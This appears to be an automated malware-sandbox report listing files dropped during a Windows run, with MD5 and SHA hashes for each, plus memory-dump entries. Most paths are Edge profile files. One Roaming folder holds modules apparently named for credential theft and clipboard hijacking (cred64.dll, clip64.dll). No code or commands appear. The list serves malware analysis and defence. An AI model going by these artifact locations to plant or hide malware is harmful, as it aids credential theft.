SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpBBB9.tmp

MD5 4bd8313fab1caf1004295d44aab77860
SHA1 0b84978fd191001c7cf461063ac63b243ffb7283
SHA256 604e2ecd34c77664dae4ceb0dab0b3e4bb6afb2778d3ed21f8d8791edd1408d9
SHA512 ca96d92a8abbd3a762e19f8e77514ee0018b7e5dc21493c37e83e22047b3cc892eced2fc80b78e6861bb972e20b93007eb46bcb7b562965be2bfa98a24c2ed65

C:\Users\Admin\AppData\Local\Temp\tmpBC58.tmp

MD5 364b225f69a62b2090de7c93c6cb5079
SHA1 2d3ef750e8a3581a87359464d70a369415c69f2f
SHA256 837ccde341197b80fa860f029fd49fdec58a9b44b5b3c153e79078cd210abbb9
SHA512 28f648630cc91c08f19cd4cbce40c2dd75c7833f65e0eb9a1e2b5bad499bb46ddf44436c3e6fdec02233975aaefa20bc7287111b5f668cdabf34223b7716f447

C:\Users\Admin\AppData\Local\Temp\tmpBC52.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpBD25.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmpBE2B.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

memory/2836-1024-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2836-1058-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 04d6ef291a6b5da14f9e6da08b7f994a
SHA1 f5e95840f7d5fcc901e44b97498bd9483d5d1e01
SHA256 24fd91ec1a620e1ec902680b667ab9bed55aba45d3752dc5665ac23b313db2ae
SHA512 9d49f4bb82493f72342723f78253a9a20520775a3727a5e18974b53f22b6845a8ac8e0abe537bac84fec69ce182673a4651b6bafafc323abf673f2332ec3bf4c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58d1e1.TMP

MD5 a3e8e81fb406aded01a5b176889ebca3
SHA1 85f7445b809dcabe6ad1a36fd5a58e24fff864c9
SHA256 474b9548618d4790ef462629d85581677a8cb8ebd995745a0ca6453a62badb41
SHA512 092d11e8bbc19ae71e0d19535496e9e9c768aefb00d2e8f74029e94bdefb060cb08607371df22437ef45afb8f8a7c0f1a8214f55d2661e08664798c185e385c7

memory/5556-1126-0x00007FF6ABD70000-0x00007FF6AC311000-memory.dmp

memory/6188-1127-0x0000000000400000-0x00000000004BE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/7164-1224-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f82e545af514cbce4c202cf0b81bc719
SHA1 3c7c9bff787940205c6233d8aa731c3299d9d09f
SHA256 9eb8ac8bcdf639158ac805f5d03036aedef279117504ea6bfdbf5d66f83a17ed
SHA512 3bbdc1e787cac396d193dcf481148b649f0a7bf750bc20383cca1c5f5e4484f980a679c2799c0a256911be2a0226d6d88a53dfbe2ba149e902e72c9c39088057

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fcadcbd271bab350ba6f55cf208d289e
SHA1 2b2b586be16a5651845e8476043e8f1e03a59dc1
SHA256 49e03841169c8af828d115d31e8a07006b1ee0f869523b07dfd52630493afb15
SHA512 ec5feabbc12ee24cae20a2a8352bd7b73405a115a959fb9e2f8e0bbb73d98b686707bc3e745508e002e74e895316384af1e739f9f38ae2b1e07a2c6eb33f4f4e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ce55ffc85ac37f9ad475d1390a238266
SHA1 dcf6a47d7350b60c78479af6e00d383b7ab3c1fc
SHA256 29b25f1aa07e422ee3ca1732994f3ccdd54b7660b111fa561198b0c33f769d55
SHA512 c12d9d13771c0a1fcb2bfa781e477fc08502c022251593f471994497966cf766793e72d7828de4421d92753ef2faa8999a99019e95bc325cd8b147b5513ea2c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7b1b2c345790596e2ab6d73f102e0c2f
SHA1 1163707e8a45f1b3d8ee4567736bfb3775ddc93d
SHA256 d6def6b5da33d1103ec3a898ba431a5cbac80cd08611df2f43c627a3d78b252e
SHA512 9f1e26c815f7e19df7330f8a758df4b24895c674657304aa021ac7e8d7845b1edfa34599a3883897c615bed3e489957084309fe6f6a8ea6c72b46bc520c79521

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003e

MD5 990324ce59f0281c7b36fb9889e8887f
SHA1 35abc926cbea649385d104b1fd2963055454bf27
SHA256 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc
SHA512 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f3377a6f7d6b9fb98c15599e13391346
SHA1 acf56bb72707fa998bdf74e6cf2f61332b3e4c5d
SHA256 3dbcb5e625a6c9217f1fc9bbebc6be01b1e6b5c91aa79ada4e4253cb46db30c8
SHA512 9f4abef5ded474cac5b3106847f2810a2efd5dac6aaf2b6b7aee046a460ee9bd4afd68ba2a0beb614f3d21a11616d538f2162c104c5e2b44d8fb57a48f783237

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 55b8eba70685c18e40be1f53d26247ce
SHA1 96913af7098178718bfd4965e3e21fc55ca2191d
SHA256 7fb2d95d7005d7587a4f657c2092e792593b87b8b5b01d994dcebc4e8ddb4053
SHA512 5408b123f95d1725b4e05418dcc4e05ceddcb3434a8a8470dbac5ed8f0c0fa90882a7c03408e0877bfff132fb00b2f4a35bfe76b677941be65919a4160a6c6fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 61e2c5b06862a78c1256b96f7f23af5a
SHA1 e5fcb94994fe8779c5ffdd070fc2192efe666a22
SHA256 41a6d957e46abed520da130bbfa036208d730831a269b7db13350f3e1696dfb3
SHA512 8da7c0347b8f07964c39de945ca385457e1f7335c23518558bbaec0bf9a2adeebb08e1cec857fc22ef89a33c5823425cbf19a8e1ba7af0cfc62f066ebb60f9da

memory/660-1615-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 67e4eea643b280ded4e6749f402ed155
SHA1 f4f03609d733f4fe946ada9d45d1c312d35ddd43
SHA256 c678055af992625dabdc77dd7b960cd41751f4265d2eadc8e4cf7d74fd02e206
SHA512 fdd4a8ef2bb6682037c1a6081a51002939a4c4f7d211219acd8df9387fd772ffc327e6bfd12cdc09a215843f099cd70d5d3ba4d2073957e3cd36ecea2947b69a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\62829829-fed9-4ddd-9265-bcd82e5cd8e8.tmp

MD5 00f746dadf32819a9eb6a3a108bb7afd
SHA1 496f52a1a5341cbb81b01e6532d82a49e9e64238
SHA256 3a6399f87d9bfa3293252a9f3e23d72920cdb2a56f4480b93dcbc1d6d2e6155a
SHA512 4d95bf5f15d2d1ea0746daff4fc8f2b1aadc97a4c115e95cc6d0212514af48bfbe85ef2e8194521e785cc332be2a03a52449372f11d719877902ccc598c5ead7

C:\Users\Admin\AppData\Local\Temp\873812795143

MD5 19880fb7efa59cadd075d8ed29767a82
SHA1 8b0fac7c912a2603c8e3c308743e85356953544b
SHA256 a80034e95fda5042bc17379be80957601c47f8f726c651d841e07e21d8bbb3b0
SHA512 cf567b03c1c4051680a438dac437c000098d3cec0aca9c1880c4a4530345765f9a6cd2c6c9286071db59e53b3b9c3932953d0d4a70d000d2c478340bf1fa6b83

memory/5880-1801-0x00007FF6BBFF0000-0x00007FF6BC591000-memory.dmp

memory/8064-1802-0x00000000009E0000-0x0000000000A00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\54061113-df90-43fb-ae6b-a1dfb55f1145\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 804d794c00a242b9008669c3a92969f5
SHA1 b9a44bef3a06c72c00a2919818697590de1decae
SHA256 4e291afb89b4f4ae729f66f897b35a9741b93b09e432ef1ca0dae1dde8b7df0c
SHA512 11c1ff35f481677d1b3dd3702efd9597ae24a36a34625bcce592f77ba885aec549ee35591e0ce565c36cd043047d59451a13d145d1db6604ac76546f3e39d630

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe597882.TMP

MD5 bbe069139372bac6c1ec0d59cf391db6
SHA1 7bb28b8e2740021fb062d4776c5806ece1daa401
SHA256 db8a2f222f353f95638e661ea21d09181aea1edf4e9959c6657cbe441a568bde
SHA512 db03ab14ccdd805ff78638e1db6a5c47748afa3d49d59b4c40e26a30303643fc9cceea82cdfe7f7aa81498fb7fece2d76d3d0465bfa537fef583eb9f9cac4f41

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a5458c34ee549443d201af41e63fb1f4
SHA1 9db96115d30e44fe6d780901ec1fce284f52bb68
SHA256 42749ac9c5c3a218bff886f48f45b653da6f30302bbd91a22836e4147af0f156
SHA512 c5645f7a20c14fa00f871e04121a7a67a2701499693d6f5d906af227589d5cca40ffc97ca05d41c568d4db1754a2e77d56562f44307b22691f4a98b3a803c3a0

memory/7916-2144-0x0000000000400000-0x00000000004B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e58debec174ab0a39c56e0fdd989dc71
SHA1 29690240d502b0336dabed8c0a907423173ecb50
SHA256 e39078040291d76385d9148b8cf128e079faa52ba3ca31e6e571399e3b37f3e8
SHA512 c9474ea810b8ef00dc3edeeaab6a9f695f8beffde43e6d52876a9274f08bb79a442e09ddaf22c0ed5155f9ba277bffd00bba2a6922330e8cf4942845d9328c5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8378e8d5c70ec9a19e766e164f520fe5
SHA1 41b04b463cf582a282865f9796a1d277ea760f65
SHA256 9fcbcbdd639520f0cad1b55e8f0f34467d713617d0a617571343714ddf124a65
SHA512 d2e4db5f86c3879e8e9c3b228bd4eb6009e0b24a77120848efc5657cc2dfe2d254d64b56fbbf038a3b1919791969f261b4dd6f0055fef77fecc03357014f964e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 79f54dcb08aef2d55bcb027868cfa94a
SHA1 f2f4c81a216657e2bc5c7bc681b5cea958d62d8f
SHA256 ed45f36b27784e448da9060e1eb661823406f873af854a7764a6cce438017c8e
SHA512 3c807646666312d9f2e7c2caf7528ca61a822e52552612b98695aee958d14d6fefed533dc7b3ac937aba6d32c8f210342f5368c7d2092cdbe1eca8ffad7e7149

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\f5692fd8-533b-48b4-8527-4942b5345049\index-dir\the-real-index

MD5 eb05dae0c51374ee1f031844fb46e20d
SHA1 65fba8a5ab08a01241c3d7f45f019fbd12d11493
SHA256 4659d68f462e5371c7374dbbe1db643b9b24f769e03f2012c78f17a1c26e276f
SHA512 e7c96c11de62b73f3d5da7b92fa313c6418f24fd8bfa995e014f7f663a0af687399b7410334ebeff4b28d3c7d3dda7f0f7d09536976a0dce3ed975359ab6abc7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\f5692fd8-533b-48b4-8527-4942b5345049\index-dir\the-real-index~RFe59cb45.TMP

MD5 7a5ade4b83d6360a5eb8bf7409bc815e
SHA1 f7ef8cc24aaa34a03ca36d67dbd4a90280ba27d5
SHA256 299d43d8845f7f9432a1e1fea646de154ac9eafd4d96ffc33243424d37a6e523
SHA512 4c279ecc5e8509365bdcebccd3ddcfa451d536eb1d5d08136a40da4641e1d0ef30ec95fa1447dd7af99a1ad57e0ddf22b293c3962e2f56b808e0374990f6de75